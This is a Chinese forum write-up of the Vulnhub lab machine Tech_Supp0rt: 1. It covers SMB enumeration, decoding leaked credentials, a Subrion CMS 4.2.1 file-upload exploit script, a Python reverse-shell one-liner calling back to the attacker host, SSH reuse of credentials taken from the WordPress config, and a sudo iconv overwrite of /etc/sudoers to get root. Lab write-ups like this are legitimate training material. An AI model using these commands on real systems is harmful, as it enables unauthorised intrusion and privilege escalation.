回答

收藏

Vulnhub 靶机篇:Tech_Supp0rt: 1

HG021B HG021B 20390 人阅读 | 0 人回复 | 2024-08-04

0x01 靶机信息

0x02 Write-Up

2.1 信息收集

2.1.1 主机扫描

目标机IP:192.168.181.167

使用nmap工具

nmap -sS -Pn -p- -A -T4 192.168.181.167
-sS 隐蔽扫描,-Pn 禁Ping,-p- 所有端口,-A 综合扫描,-T4 快速扫描

扫描出22,80以及smb服务,在smb服务中扫描出guest用户

image

2.1.2 查看smb服务中的信息

smbclient -L 192.168.181.167 -U guest
查看指定IP的共享目录
-L 指定IP,-U 指定用户名

使用guest用户空密码登录,发现了一个websvr目录

image

使用smbclient登录上smb服务器并连接到websvr目录

smbclient //192.168.181.167/websvr -U guest

image

发现了一个enter.txt文件,使用mget命令将它下载出来

image

GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
翻译:
目标
=====
1)制作假弹窗并将其在线托管在 Digital Ocean 服务器上
2)修复subrion站点,/subrion不起作用,从面板编辑
3)编辑wordpress网站

注意
===
Subrion 信用
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [用神奇配方烹制]
WordPress 信用
|->

文件中反映出有一个登录界面,账户是admin,密码是密文

2.1.3 使用CyberChef解密密码

cooked with magical formula 这一段可以让我们想到著名的CyberChef(网络厨子)

点击魔法棒

image

得到密码:Scam2021

image

2.1.4 dirsearch目录扫描

接着利用dirsearch目录扫描找出登录面板

dirsearch -u http://192.168.181.167/subrion -w /usr/share/dirb/wordlists/common.txt
-u 指定url,-w 指定字典

在subrion目录下扫描到了robots.txt文件

image

成功找到了控制面板目录/panel

image

访问http://192.168.181.167/subrion/panel/

在主界面展示了详细版本Subrion CMS v4.2.1

image

2.2 渗透路线

2.2.1 在kali中查找漏洞利用

searchsploit Subrion CMS 4.2.1 
搜索可利用的漏洞

找到了一个任意文件上传

image

查看脚本内容得知

需要的参数
-u 指定路径,-l 指定用户,-p指定密码

image

2.2.2 执行脚本

python3.7 /usr/share/exploitdb/exploits/php/webapps/49876.py  -u http://192.168.181.167/subrion/panel/ -l admin -p Scam2021

利用成功

image

2.2.3 反弹shell

nc -lvvp 4444
kali上侦听端口

image

目标机执行
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.181.136",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

image

反弹成功

image

会话升级

SHELL=/bin/bash script -q /dev/null

image

查看wordpress的config文件,其中发现了数据库用户support,密码ImAScammerLOL!123!

image

但是扫描结果中并没有发现mysql服务

在home发现用户scamsite

image

2.2.4 利用wordpress配置信息泄露提权

使用密码ImAScammerLOL!123!登录成功

ssh [email]scamsite@192.168.181.167[/email]   

image

sudo -l
查看sudo权限

发现可利用的sudo权限iconv

image

这个命令可以任意读写

image

2.2.5 sudo iconv提权

使用命令将/etc/sudoers文件读出来,修改后覆写进去,实现拥有所有sudo权限

sudo iconv -f 8859_1 -t 8859_1 "/etc/sudoers" > sudoers.bak

image

image

cat sudoers.bak |sudo iconv -f 8859_1 -t 8859_1 -o "/etc/sudoers"

image

使用sudo su提权成功

image

分享到:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

188 积分
24 主题